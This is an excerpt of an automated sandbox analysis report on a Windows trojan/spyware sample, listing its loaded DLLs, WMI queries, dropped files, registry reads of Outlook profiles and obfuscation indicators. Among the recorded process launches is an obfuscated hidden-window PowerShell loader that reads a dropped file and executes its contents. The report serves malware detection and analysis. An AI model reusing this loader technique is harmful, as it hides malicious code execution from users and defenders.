            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: version.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: edputil.dllJump to behavior
            Source: hnTW5HdWvY.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@8/20@6/4
            Source: C:\Users\user\Desktop\hnTW5HdWvY.exeCode function: 0_2_004042A6 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,0_2_004042A6
            Source: C:\Users\user\Desktop\hnTW5HdWvY.exeCode function: 0_2_00402036 CoCreateInstance,MultiByteToWideChar,0_2_00402036
            Source: C:\Users\user\Desktop\hnTW5HdWvY.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\FontsJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeMutant created: NULL
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3004:120:WilError_03
            Source: C:\Users\user\Desktop\hnTW5HdWvY.exeFile created: C:\Users\user\AppData\Local\Temp\nsy1948.tmpJump to behavior
            Source: hnTW5HdWvY.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
            Source: C:\Program Files (x86)\Windows Mail\wab.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Program Files (x86)\Windows Mail\wab.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Program Files (x86)\Windows Mail\wab.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Users\user\Desktop\hnTW5HdWvY.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\hnTW5HdWvY.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: hnTW5HdWvY.exeReversingLabs: Detection: 50%
            Source: hnTW5HdWvY.exeVirustotal: Detection: 50%
            Source: C:\Users\user\Desktop\hnTW5HdWvY.exeFile read: C:\Users\user\Desktop\hnTW5HdWvY.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\hnTW5HdWvY.exe "C:\Users\user\Desktop\hnTW5HdWvY.exe"
            Source: C:\Users\user\Desktop\hnTW5HdWvY.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Apologi133=Get-Content 'C:\Users\user\AppData\Roaming\kraftfuldheders\Fide231\recited\Bundforskelligt.For';$Equestrial=$Apologi133.SubString(19094,3);.$Equestrial($Apologi133)"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "set /A 1^^0"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
            Source: C:\Users\user\Desktop\hnTW5HdWvY.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Apologi133=Get-Content 'C:\Users\user\AppData\Roaming\kraftfuldheders\Fide231\recited\Bundforskelligt.For';$Equestrial=$Apologi133.SubString(19094,3);.$Equestrial($Apologi133)"Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "set /A 1^^0"Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"Jump to behavior
            Source: C:\Users\user\Desktop\hnTW5HdWvY.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
            Source: C:\Users\user\Desktop\hnTW5HdWvY.exeFile written: C:\ProgramData\Microsoft\Windows\Start Menu\farseringernes.iniJump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
            Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000001.00000002.2015644677.00000000071A6000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\symbols\dll\System.Management.Automation.pdbC:4 source: powershell.exe, 00000001.00000002.2010532480.0000000002B40000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000001.00000002.2017911817.00000000081B4000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: indows\System.Core.pdb source: powershell.exe, 00000001.00000002.2017782713.0000000008175000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5 source: powershell.exe, 00000001.00000002.2015644677.000000000726A000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\symbols\dll\System.Management.Automation.pdbS source: powershell.exe, 00000001.00000002.2010532480.0000000002B40000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Core.pdb source: powershell.exe, 00000001.00000002.2015644677.00000000071A6000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Core.pdbk source: powershell.exe, 00000001.00000002.2015644677.00000000071A6000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Windows\System.Core.pdbpdbore.pdb source: powershell.exe, 00000001.00000002.2015644677.00000000071CB000.00000004.00000020.00020000.00000000.sdmp

            Data Obfuscation

            barindex
            Source: Yara matchFile source: 00000001.00000002.2018427169.0000000008E2F000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "set /A 1^^0"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "set /A 1^^0"Jump to behavior
            Source: C:\Users\user\Desktop\hnTW5HdWvY.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Apologi133=Get-Content 'C:\Users\user\AppData\Roaming\kraftfuldheders\Fide231\recited\Bundforskelligt.For';$Equestrial=$Apologi133.SubString(19094,3);.$Equestrial($Apologi133)"
            Source: C:\Users\user\Desktop\hnTW5HdWvY.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Apologi133=Get-Content 'C:\Users\user\AppData\Roaming\kraftfuldheders\Fide231\recited\Bundforskelligt.For';$Equestrial=$Apologi133.SubString(19094,3);.$Equestrial($Apologi133)"Jump to behavior
            Source: C:\Users\user\Desktop\hnTW5HdWvY.exeCode function: 0_2_00405EA5 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00405EA5
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_0489AA6A pushad ; ret 1_2_0489AA71
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_048910E7 push eax; retf 0070h1_2_04891122
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_04891127 push eax; retf 0070h1_2_04891132
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_04891137 push eax; retf 0070h1_2_04891142
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_08CB00A9 push ss; ret 1_2_08CB00B2
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_08CB49D6 push edi; iretd 1_2_08CB49D5
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_08CBE9EA push 6D4A5B23h; retf 1_2_08CBE9F1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_08CB498E push edi; iretd 1_2_08CB49D5
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_08CB0134 push ebx; ret 1_2_08CB013E
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_08CB3F48 pushad ; ret 1_2_08CB3F49
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_08CBFF07 push 67AC2B90h; iretd 1_2_08CBFF13
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 5_2_00A70C95 push edi; ret 5_2_00A70CC2
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 5_2_042200A9 push ss; ret 5_2_042200B2
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 5_2_04220134 push ebx; ret 5_2_0422013E
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 5_2_0422498E push edi; iretd 5_2_042249D5
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 5_2_0422E9EA push 6D4A5B23h; retf 5_2_0422E9F1
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 5_2_042249D6 push edi; iretd 5_2_042249D5
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 5_2_0422FF07 push 67AC2B90h; iretd 5_2_0422FF13
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 5_2_04223F48 pushad ; ret 5_2_04223F49
            Source: C:\Users\user\Desktop\hnTW5HdWvY.exeFile created: C:\Users\user\AppData\Local\Temp\nst19C6.tmp\nsExec.dllJump to dropped file
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\kraftfuldheders\Fide231\recited\Antiputrefactive\Afmarcher\Overforbrugs\hnTW5HdWvY.exeJump to dropped file
            Source: C:\Users\user\Desktop\hnTW5HdWvY.exeFile created: C:\ProgramData\Microsoft\Windows\Start Menu\farseringernes.iniJump to behavior
            Source: C:\Users\user\Desktop\hnTW5HdWvY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hnTW5HdWvY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hnTW5HdWvY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hnTW5HdWvY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hnTW5HdWvY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hnTW5HdWvY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hnTW5HdWvY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hnTW5HdWvY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
